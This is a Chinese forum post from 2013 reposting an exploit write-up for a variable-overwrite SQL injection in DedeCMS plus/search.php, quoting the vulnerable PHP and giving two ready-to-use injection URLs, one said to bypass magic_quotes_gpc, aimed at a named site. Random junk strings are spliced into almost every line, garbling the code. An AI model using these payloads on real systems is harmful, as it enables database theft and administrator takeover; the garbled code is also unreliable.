微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.$ a4 a& R, A$ e! | }# A
作者: c4rp3nt3r@0x50sec.org
# g; {9 A' `4 m9 B- c# y4 iDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
% t$ ~5 I7 }$ j3 ]
/ k# h* E; w% y* O/ u0 Z, k& m1 ? T黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
9 r3 [1 k$ |5 d5 ~+ B7 ^: Q {9 V. K & ^& x, I" R/ h8 y% U) M
============
- a) v: D: M* X! D$ d
T3 x7 C0 a6 t, X/ d 7 M+ ^. T3 y/ b+ x' Y! {
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.' @$ R6 p- a0 T7 q$ S9 q
9 y5 [" W% m7 D
require_once(dirname(__FILE__).”/../include/common.inc.php”);
+ B4 z; k4 |7 F8 Rrequire_once(DEDEINC.”/arc.searchview.class.php”);, c2 L0 B3 B2 i/ v( H; R* [5 g d
( U7 U J2 \6 C9 _' c+ c5 f4 M
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;; D: N2 R! g- U0 v+ _# w% l3 S
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
/ Q/ h L( _% w# D2 [7 ~+ @$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
7 s3 E4 a9 n! q$ P% C$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;. t, j9 ^) V4 q* T
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
+ \) q" `2 [8 Q3 n7 W7 A, L) K & a. f$ m1 G( L
if(!isset($orderby)) $orderby=”;- H$ F8 P3 ^& \8 J! p; @/ A' m
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
5 }% }5 k, a6 i7 b( u: K
V4 J7 D0 x" d; I
4 V8 S6 c2 e% M+ r( t1 zif(!isset($searchtype)) $searchtype = ‘titlekeyword’;5 P. J$ S7 Y5 @
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);1 k* S7 L7 l2 g
% S" N' \7 @' M
if(!isset($keyword)){
) y/ f! X7 I! V9 B8 d& o. f if(!isset($q)) $q = ”; m5 {$ s, Y3 I; c+ i" z* K- g
$keyword=$q;
+ `+ F# E4 L0 W4 \# W}! w0 ~* g7 t/ r* c
% h, o9 K4 F3 i5 S6 k8 B$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
* \& g0 {: E1 v# Z+ |8 _4 X! f * @+ {1 p+ ]' @9 b2 J! x" m
//查找栏目信息: m! P. J9 g& K
if(empty($typeid))% g: i) U* U' D2 g
{2 Y( @/ E& Z/ w
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
3 ^4 b! F. K8 [: m( z# [2 q% K* V if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
+ s( K. \6 A V! w; k( l+ t5 p {0 B8 Y6 m1 I- ~+ `; T
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
( |" W7 Y5 p I' z6 U fwrite($fp, “<”.”?php\r\n”);
# J. M/ N* r: d% n $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);* Q5 p/ G& Z" k
$dsql->Execute();' {: j% j! f/ ^: @& Q
while($row = $dsql->GetArray())3 Z8 ^" }- v/ E- S& }6 N' [4 ?
{$ j& U/ q" @( l) }
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);$ w" L( m) `: a. j
}
& [: h# D# `0 y! @ fwrite($fp, ‘?’.'>’);
" r) p0 t6 Y& g; r fclose($fp);
/ K' | V4 P3 ?- B' K( k }0 R7 C9 S/ ^; c9 G+ V! m
//引入栏目缓存并看关键字是否有相关栏目内容! x Q7 I+ X) j" R, u1 U ~6 x1 v
require_once($typenameCacheFile);
* U+ p" n+ C+ L* Q+ ]) E//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个% H ?- S0 `& u
//
' O4 Y; d2 t4 j if(isset($typeArr) && is_array($typeArr))* c2 P0 J9 P; [9 L2 M! W
{
/ G8 B7 \8 E4 q; ?+ b: k foreach($typeArr as $id=>$typename)
+ `6 {( W+ l$ t( ]9 Z$ S {
I+ n: N1 C$ Y4 W; r' ]/ F 2 |# A8 E* F, D2 o
<font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过* O8 Z; |5 X$ U; r
if($keyword != $keywordn)4 @ Z; n; ~( ]+ d! A5 W
{
6 }# b" V% T- s$ a2 u4 h, a $keyword = $keywordn;
5 Y0 }3 H) ?, W5 W" b5 u; y <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设" m y; `+ ^* i7 n. m7 i! W
break;
# B A' }9 W" z |4 @ B# E }9 c1 q5 {0 f( U6 u i* m- s
}, o" A/ q+ M! l$ Q5 O- l9 o# B
}
; p3 T2 a+ q( z1 {9 b}
6 {* X- F, {* R然后plus/search.php文件下面定义了一个 Search类的对象 .8 d- X( q: E9 e6 z& n, M; A1 g) ]
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.. ~ U' f x; \7 D) w
$this->TypeLink = new TypeLink($typeid);- ?/ @$ C* L9 B9 s" j0 V
( S, A( g% S9 z, R
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.+ H- U0 A5 _% _* |9 v+ U
: W2 I6 {8 E" M' h
class TypeLink
, s# {$ G {7 a4 L3 U{" t# C4 [6 Z- X/ U" t V0 S4 o
var $typeDir;5 I- P$ P6 D6 O# i
var $dsql;+ c6 ]5 S- v% ^# G* R1 r
var $TypeID;
; H5 {2 `6 d' K var $baseDir; d3 }- T! s; {" H
var $modDir;
0 h% V4 Z2 Q) ^- Q5 S& v var $indexUrl;6 K0 D1 I: c/ ]+ Q" B0 y' w4 B5 d
var $indexName;
( Q5 i, P2 C4 { var $TypeInfos;8 h% G/ _/ R8 p- D/ [6 b; t5 O0 I
var $SplitSymbol;% h( f/ o" K' T5 M9 w* w1 }
var $valuePosition;. {) q4 U9 Y+ a
var $valuePositionName;
7 T1 j3 O5 U0 a; q" ~# d var $OptionArrayList;//构造函数///////
1 c# G) m# ^/ ?" j //php5构造函数
; x( w* H/ W9 q! S) I function __construct($typeid)! R4 F W) w' o; v$ d8 |* X0 J
{
3 y6 J2 \8 x; ^3 ~' B; h0 P" }# n $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
4 d7 l* d4 a9 ] $this->indexName = $GLOBALS['cfg_indexname'];
, k: {- O3 d4 z' w) f# G $this->baseDir = $GLOBALS['cfg_basedir'];
7 r9 v2 f- E' {4 c. }( g5 j; V $this->modDir = $GLOBALS['cfg_templets_dir'];! K4 h: ?9 t* k% V& e- I) d
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
0 s/ R3 c' G$ Z7 a. |6 ^ $this->dsql = $GLOBALS['dsql'];( ?& K# p. U! _# ?5 ?* l
$this->TypeID = $typeid;
) Z: x* }" e8 H) X Z& d7 Y $this->valuePosition = ”;! g4 h" a, _2 {' P: e4 }; b
$this->valuePositionName = ”;6 h$ Y7 x+ b) Y1 R Z% C
$this->typeDir = ”;4 o" K0 ^0 ?* k2 I0 x
$this->OptionArrayList = ”;
* o: j. J& y8 ~# s& n 9 B* |9 {( |. O) Q3 [+ q
//载入类目信息
' l( ~3 s; {3 y. l% S* { ; c: [) K. A4 T9 D# |2 G
<font color=”Red”>$query = “SELECT tp.*,ch.typename as& V) r9 l) i2 A' b' Z; v
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join& ]4 B, w o, s2 W9 j
`#@__channeltype` ch
5 b/ @4 l. V# h/ Z on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿: h# @0 n. `9 }2 H" x& p
: }- r9 g2 ]5 b, H: o. q2 }# l
if($typeid > 0)5 d. L% p' B. u8 o) C
{
0 F) [. W- e% K3 y' N6 X $this->TypeInfos = $this->dsql->GetOne($query);5 L& Z; Y1 c. |2 s) c
利用代码一 需要 即使magic_quotes_gpc = Off
g# X) Q: C( n# `
0 {$ N, U5 q& e5 m# a5 R2 S& B; Hwww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title |: k& o1 E1 ?
# z( b* B" X0 o8 r* a7 ~
这只是其中一个利用代码… Search 类的构造函数再往下
. r1 x9 s8 t/ x& i
) t& m5 J0 G2 w V……省略+ i1 E; K2 r2 D
$this->TypeID = $typeid;
4 {& J, Q7 `( l$ E4 f7 c……省略1 \0 t. {5 m( S" Y' k, y; D! v) L
if($this->TypeID==”0″){2 k! Z5 P3 @2 P& ~
$this->ChannelTypeid=1;
) \2 N7 C& d; S t3 y }else{0 _: D- |+ ?3 \9 x
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲 b+ v) i3 U, s' C5 D
//现在不鸡肋了吧亲…# w% f% d- [9 i* {/ {" O1 A: w
$this->ChannelTypeid=$row['channeltype'];" L& b% @+ Z$ q6 d- ]! U7 q
: O7 M* r1 I5 D/ f
}2 Y. F' {' a+ i/ B
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.9 Z8 A7 b4 Q: K. }" Z
. m( a$ \0 F& g3 n2 n: v+ Awww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
% ^- z" U# j4 h( Y3 J3 h: q/ b , _" R8 V; X9 v, c" T3 v
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
5 J- S, S& N0 j8 x3 V- \ |
发表于 2013-1-19 08:18:56
收藏
支持
反对